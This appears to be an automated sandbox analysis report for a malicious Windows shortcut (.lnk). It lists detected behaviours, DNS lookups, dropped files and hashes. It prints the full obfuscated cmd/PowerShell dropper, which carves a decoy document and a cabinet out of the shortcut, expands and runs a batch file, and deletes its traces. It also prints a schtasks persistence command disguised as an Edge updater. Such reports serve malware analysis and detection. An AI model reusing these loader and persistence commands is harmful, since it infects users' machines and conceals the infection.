Analysis Overview
SHA256
00b6a18a47bdecbf3f97e0a9188e0080a59d87beb4002e8775b036ddee978d37
Threat Level: Likely malicious
The file 00b6a18a47bdecbf3f97e0a9188e0080a59d87beb4002e8775b036ddee978d37 was found to be: Likely malicious.
Malicious Activity Summary
Command and Scripting Interpreter: PowerShell
Deletes itself
Checks computer location settings
Drops file in Windows directory
Enumerates physical storage devices
Suspicious use of AdjustPrivilegeToken
Creates scheduled task(s)
Suspicious use of SetWindowsHookEx
Suspicious behavior: EnumeratesProcesses
Suspicious use of WriteProcessMemory
Modifies registry class
Suspicious behavior: CmdExeWriteProcessMemorySpam
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-06-11 04:49
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-06-11 04:49
Reported
2024-06-11 04:52
Platform
win7-20240508-en
Max time kernel
118s
Max time network
126s
Command Line
Signatures
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Enumerates physical storage devices
Suspicious behavior: CmdExeWriteProcessMemorySpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\syswow64\cmd.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1744 wrote to memory of 2760 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\syswow64\cmd.exe |
| PID 1744 wrote to memory of 2760 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\syswow64\cmd.exe |
| PID 1744 wrote to memory of 2760 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\syswow64\cmd.exe |
| PID 1744 wrote to memory of 2760 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\syswow64\cmd.exe |
| PID 2760 wrote to memory of 2860 | N/A | C:\Windows\syswow64\cmd.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
| PID 2760 wrote to memory of 2860 | N/A | C:\Windows\syswow64\cmd.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
| PID 2760 wrote to memory of 2860 | N/A | C:\Windows\syswow64\cmd.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
| PID 2760 wrote to memory of 2860 | N/A | C:\Windows\syswow64\cmd.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
Processes
C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\00b6a18a47bdecbf3f97e0a9188e0080a59d87beb4002e8775b036ddee978d37.lnk
C:\Windows\syswow64\cmd.exe
"C:\Windows\syswow64\cmd.exe" /q /c Set a4qw7afej=etodrpyswhnli && call %a4qw7afej:~5,1%%a4qw7afej:~2,1%%a4qw7afej:~8,1%%a4qw7afej:~0,1%%a4qw7afej:~4,1%%a4qw7afej:~7,1%%a4qw7afej:~9,1%%a4qw7afej:~0,1%%a4qw7afej:~11,1%%a4qw7afej:~11,1% -%a4qw7afej:~8,1%%a4qw7afej:~12,1%%a4qw7afej:~10,1%%a4qw7afej:~3,1%%a4qw7afej:~2,1%%a4qw7afej:~8,1%%a4qw7afej:~7,1%%a4qw7afej:~1,1%%a4qw7afej:~6,1%%a4qw7afej:~11,1%%a4qw7afej:~0,1% %a4qw7afej:~9,1%%a4qw7afej:~12,1%%a4qw7afej:~3,1%%a4qw7afej:~3,1%%a4qw7afej:~0,1%%a4qw7afej:~10,1% "$NiQttN1 = Get-Location;if($NiQttN1 -Match 'System32' -or $NiQttN1 -Match 'Program Files') {$NiQttN1 = 'C:\Users\Admin\AppData\Local\Temp'};$W7plh7D3zZI=@('.lnk');$urhLT9eZ3Vc = Get-ChildItem -Path $NiQttN1 -Recurse *.* -File | where {$_.extension -in $W7plh7D3zZI} | where-object {$_.length -eq 0x0210CCCC} | Select-Object -ExpandProperty FullName;$aqucL5hpsgw_ = New-Object System.IO.FileStream($urhLT9eZ3Vc, [System.IO.FileMode]::Open, [System.IO.FileAccess]::Read);$aqucL5hpsgw_.Seek(0x00001A0D, [System.IO.SeekOrigin]::Begin);$cqcRL0PBMTfs = New-Object byte[] 0x0000ABF6;$aqucL5hpsgw_.Read($cqcRL0PBMTfs, 0, 0x0000ABF6);$smRWm5tMSPXA = $urhLT9eZ3Vc.replace('.lnk','.hwpx');sc $smRWm5tMSPXA $cqcRL0PBMTfs -Encoding Byte;& $smRWm5tMSPXA;$aqucL5hpsgw_.Seek(0x0000C603, [System.IO.SeekOrigin]::Begin);$pyZmuKvG=New-Object byte[] 0x00000680;$aqucL5hpsgw_.Read($pyZmuKvG, 0, 0x00000680);$aqucL5hpsgw_.Close();Remove-Item -Path $urhLT9eZ3Vc -Force;$xGE_47GiT6=$env:programdata + '\MicrosoftEdge';mkdir $xGE_47GiT6;$oyYsDBuAJ=$xGE_47GiT6 + '\gewcdqa.c' + 'ab';sc $oyYsDBuAJ $pyZmuKvG -Encoding Byte;expand $oyYsDBuAJ -f:* $xGE_47GiT6;$fXoeoYo=$xGE_47GiT6 + '\parkonA.b' + 'at';&$fXoeoYo;Remove-Item -Path $oyYsDBuAJ -Force;"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -windowstyle hidden "$NiQttN1 = Get-Location;if($NiQttN1 -Match 'System32' -or $NiQttN1 -Match 'Program Files') {$NiQttN1 = 'C:\Users\Admin\AppData\Local\Temp'};$W7plh7D3zZI=@('.lnk');$urhLT9eZ3Vc = Get-ChildItem -Path $NiQttN1 -Recurse *.* -File | where {$_.extension -in $W7plh7D3zZI} | where-object {$_.length -eq 0x0210CCCC} | Select-Object -ExpandProperty FullName;$aqucL5hpsgw_ = New-Object System.IO.FileStream($urhLT9eZ3Vc, [System.IO.FileMode]::Open, [System.IO.FileAccess]::Read);$aqucL5hpsgw_.Seek(0x00001A0D, [System.IO.SeekOrigin]::Begin);$cqcRL0PBMTfs = New-Object byte[] 0x0000ABF6;$aqucL5hpsgw_.Read($cqcRL0PBMTfs, 0, 0x0000ABF6);$smRWm5tMSPXA = $urhLT9eZ3Vc.replace('.lnk','.hwpx');sc $smRWm5tMSPXA $cqcRL0PBMTfs -Encoding Byte;& $smRWm5tMSPXA;$aqucL5hpsgw_.Seek(0x0000C603, [System.IO.SeekOrigin]::Begin);$pyZmuKvG=New-Object byte[] 0x00000680;$aqucL5hpsgw_.Read($pyZmuKvG, 0, 0x00000680);$aqucL5hpsgw_.Close();Remove-Item -Path $urhLT9eZ3Vc -Force;$xGE_47GiT6=$env:programdata + '\MicrosoftEdge';mkdir $xGE_47GiT6;$oyYsDBuAJ=$xGE_47GiT6 + '\gewcdqa.c' + 'ab';sc $oyYsDBuAJ $pyZmuKvG -Encoding Byte;expand $oyYsDBuAJ -f:* $xGE_47GiT6;$fXoeoYo=$xGE_47GiT6 + '\parkonA.b' + 'at';&$fXoeoYo;Remove-Item -Path $oyYsDBuAJ -Force;"
Network
Files
Analysis: behavioral2
Detonation Overview
Submitted
2024-06-11 04:49
Reported
2024-06-11 04:52
Platform
win10v2004-20240426-en
Max time kernel
150s
Max time network
151s
Command Line
Signatures
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-540404634-651139247-2967210625-1000\Control Panel\International\Geo\Nation | C:\Windows\system32\cmd.exe | N/A |
Deletes itself
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\LOGS\DPX\setuperr.log | C:\Windows\SysWOW64\expand.exe | N/A |
| File opened for modification | C:\Windows\LOGS\DPX\setupact.log | C:\Windows\SysWOW64\expand.exe | N/A |
Enumerates physical storage devices
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-540404634-651139247-2967210625-1000_Classes\Local Settings | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-540404634-651139247-2967210625-1000_Classes\Local Settings | C:\Windows\system32\OpenWith.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\OpenWith.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\00b6a18a47bdecbf3f97e0a9188e0080a59d87beb4002e8775b036ddee978d37.lnk
C:\Windows\syswow64\cmd.exe
"C:\Windows\syswow64\cmd.exe" /q /c Set a4qw7afej=etodrpyswhnli && call %a4qw7afej:~5,1%%a4qw7afej:~2,1%%a4qw7afej:~8,1%%a4qw7afej:~0,1%%a4qw7afej:~4,1%%a4qw7afej:~7,1%%a4qw7afej:~9,1%%a4qw7afej:~0,1%%a4qw7afej:~11,1%%a4qw7afej:~11,1% -%a4qw7afej:~8,1%%a4qw7afej:~12,1%%a4qw7afej:~10,1%%a4qw7afej:~3,1%%a4qw7afej:~2,1%%a4qw7afej:~8,1%%a4qw7afej:~7,1%%a4qw7afej:~1,1%%a4qw7afej:~6,1%%a4qw7afej:~11,1%%a4qw7afej:~0,1% %a4qw7afej:~9,1%%a4qw7afej:~12,1%%a4qw7afej:~3,1%%a4qw7afej:~3,1%%a4qw7afej:~0,1%%a4qw7afej:~10,1% "$NiQttN1 = Get-Location;if($NiQttN1 -Match 'System32' -or $NiQttN1 -Match 'Program Files') {$NiQttN1 = 'C:\Users\Admin\AppData\Local\Temp'};$W7plh7D3zZI=@('.lnk');$urhLT9eZ3Vc = Get-ChildItem -Path $NiQttN1 -Recurse *.* -File | where {$_.extension -in $W7plh7D3zZI} | where-object {$_.length -eq 0x0210CCCC} | Select-Object -ExpandProperty FullName;$aqucL5hpsgw_ = New-Object System.IO.FileStream($urhLT9eZ3Vc, [System.IO.FileMode]::Open, [System.IO.FileAccess]::Read);$aqucL5hpsgw_.Seek(0x00001A0D, [System.IO.SeekOrigin]::Begin);$cqcRL0PBMTfs = New-Object byte[] 0x0000ABF6;$aqucL5hpsgw_.Read($cqcRL0PBMTfs, 0, 0x0000ABF6);$smRWm5tMSPXA = $urhLT9eZ3Vc.replace('.lnk','.hwpx');sc $smRWm5tMSPXA $cqcRL0PBMTfs -Encoding Byte;& $smRWm5tMSPXA;$aqucL5hpsgw_.Seek(0x0000C603, [System.IO.SeekOrigin]::Begin);$pyZmuKvG=New-Object byte[] 0x00000680;$aqucL5hpsgw_.Read($pyZmuKvG, 0, 0x00000680);$aqucL5hpsgw_.Close();Remove-Item -Path $urhLT9eZ3Vc -Force;$xGE_47GiT6=$env:programdata + '\MicrosoftEdge';mkdir $xGE_47GiT6;$oyYsDBuAJ=$xGE_47GiT6 + '\gewcdqa.c' + 'ab';sc $oyYsDBuAJ $pyZmuKvG -Encoding Byte;expand $oyYsDBuAJ -f:* $xGE_47GiT6;$fXoeoYo=$xGE_47GiT6 + '\parkonA.b' + 'at';&$fXoeoYo;Remove-Item -Path $oyYsDBuAJ -Force;"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -windowstyle hidden "$NiQttN1 = Get-Location;if($NiQttN1 -Match 'System32' -or $NiQttN1 -Match 'Program Files') {$NiQttN1 = 'C:\Users\Admin\AppData\Local\Temp'};$W7plh7D3zZI=@('.lnk');$urhLT9eZ3Vc = Get-ChildItem -Path $NiQttN1 -Recurse *.* -File | where {$_.extension -in $W7plh7D3zZI} | where-object {$_.length -eq 0x0210CCCC} | Select-Object -ExpandProperty FullName;$aqucL5hpsgw_ = New-Object System.IO.FileStream($urhLT9eZ3Vc, [System.IO.FileMode]::Open, [System.IO.FileAccess]::Read);$aqucL5hpsgw_.Seek(0x00001A0D, [System.IO.SeekOrigin]::Begin);$cqcRL0PBMTfs = New-Object byte[] 0x0000ABF6;$aqucL5hpsgw_.Read($cqcRL0PBMTfs, 0, 0x0000ABF6);$smRWm5tMSPXA = $urhLT9eZ3Vc.replace('.lnk','.hwpx');sc $smRWm5tMSPXA $cqcRL0PBMTfs -Encoding Byte;& $smRWm5tMSPXA;$aqucL5hpsgw_.Seek(0x0000C603, [System.IO.SeekOrigin]::Begin);$pyZmuKvG=New-Object byte[] 0x00000680;$aqucL5hpsgw_.Read($pyZmuKvG, 0, 0x00000680);$aqucL5hpsgw_.Close();Remove-Item -Path $urhLT9eZ3Vc -Force;$xGE_47GiT6=$env:programdata + '\MicrosoftEdge';mkdir $xGE_47GiT6;$oyYsDBuAJ=$xGE_47GiT6 + '\gewcdqa.c' + 'ab';sc $oyYsDBuAJ $pyZmuKvG -Encoding Byte;expand $oyYsDBuAJ -f:* $xGE_47GiT6;$fXoeoYo=$xGE_47GiT6 + '\parkonA.b' + 'at';&$fXoeoYo;Remove-Item -Path $oyYsDBuAJ -Force;"
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
C:\Windows\SysWOW64\expand.exe
"C:\Windows\system32\expand.exe" C:\ProgramData\MicrosoftEdge\gewcdqa.cab -f:* C:\ProgramData\MicrosoftEdge
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\ProgramData\MicrosoftEdge\parkonA.bat""
C:\Windows\SysWOW64\schtasks.exe
schtasks /create /sc minute /mo 13 /tn "MicrosoftEdgeEasyUpdate" /tr "cmd /q /c \"start \"Microsoft Edge Updater\" /min \"C:\ProgramData\MicrosoftEdge\parkon.bat\" &exit\"" /f
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.150.49.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 104.219.191.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 28.118.140.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 86.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 48.110.63.41.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 30.243.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 |  | udp |
Files
memory/3352-0-0x0000000074BFE000-0x0000000074BFF000-memory.dmp
memory/3352-1-0x0000000004980000-0x00000000049B6000-memory.dmp
memory/3352-2-0x0000000005080000-0x00000000056A8000-memory.dmp
memory/3352-3-0x0000000074BF0000-0x00000000753A0000-memory.dmp
memory/3352-4-0x0000000074BF0000-0x00000000753A0000-memory.dmp
memory/3352-5-0x0000000004FB0000-0x0000000004FD2000-memory.dmp
memory/3352-6-0x00000000058A0000-0x0000000005906000-memory.dmp
memory/3352-7-0x0000000005910000-0x0000000005976000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_r3ziythu.2hi.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/3352-17-0x0000000005B50000-0x0000000005EA4000-memory.dmp
memory/3352-18-0x0000000005F30000-0x0000000005F4E000-memory.dmp
memory/3352-19-0x0000000005F80000-0x0000000005FCC000-memory.dmp
memory/3352-20-0x0000000006F30000-0x0000000006FC6000-memory.dmp
memory/3352-21-0x0000000006480000-0x000000000649A000-memory.dmp
memory/3352-22-0x00000000064D0000-0x00000000064F2000-memory.dmp
memory/3352-23-0x00000000077D0000-0x0000000007D74000-memory.dmp
memory/3352-24-0x0000000008400000-0x0000000008A7A000-memory.dmp
\??\c:\programdata\microsoftedge\gewcdqa.cab
| MD5 | bce6d6994700a3e05b4a22e3381a4d36 |
| SHA1 | 6d3b8fd8c18f1daad940d3589890054fe5ff21b1 |
| SHA256 | 623bda38e2790240ae31383db173ded9d295aa484f653ed4f1329174bbaf6154 |
| SHA512 | 3dff495bfdb146ab244faefd7ea5944836bddf03732a2402f82b7d09cc45292a43f3188527c9099e216b50279507bfdadd0689c2bf44237a1cbea9123016558e |
C:\ProgramData\MicrosoftEdge\parkonA.bat
| MD5 | a938e5c37311dabc48dc1d14c520b02a |
| SHA1 | db9111dbb2eef7fb3482fa014bcea90c9b3df1f5 |
| SHA256 | fc13917afce9cae08c5aadfa35cf7b210208527e4d0a7f02d24eac82dc96460f |
| SHA512 | a9e8e5f93dac1e72985719e6bbd612e90459d71f4a7b0848198346d031c3777ad02f4d13a38ccb05a03a317290dc3538cb3da032e53482d1718ce083d648b09e |
C:\ProgramData\MicrosoftEdge\parkon.pko
| MD5 | f772107c865925631a56fac02f0c9631 |
| SHA1 | cdc8ee71f01c59c3362548f751ec2803b745c6bd |
| SHA256 | e173955f4c0d266c3a108a95eeca07c88df1810b763b1b254596e40e75177894 |
| SHA512 | 4efc5babb74ed98f78b6a342290c1f7645fc49c247d4eece1c2cbe6fdb25df70ce9ca78ac0929121898e180385f575f92304c3a09a8db1fcb4af43e5a4238235 |
C:\ProgramData\MicrosoftEdge\parkonB.pko
| MD5 | 0d550d3c3fcc95dc191a9cb56f8d7fea |
| SHA1 | e557278ee060b09fa227a0b9ef144e021763ecd5 |
| SHA256 | 16ccd83a5c3d0e686491e7f7f650a7199d6add01c25fe587bf81b1e43575f564 |
| SHA512 | 219d9f06cab7289935d1fc3476d41218b7910cce9fa9c60eda129d430b7f6d30e58a9619cfd6f93da9b1fde3c7f7d07383ecd174fcf2c98618ac75bbb804ca60 |
memory/3352-51-0x0000000074BF0000-0x00000000753A0000-memory.dmp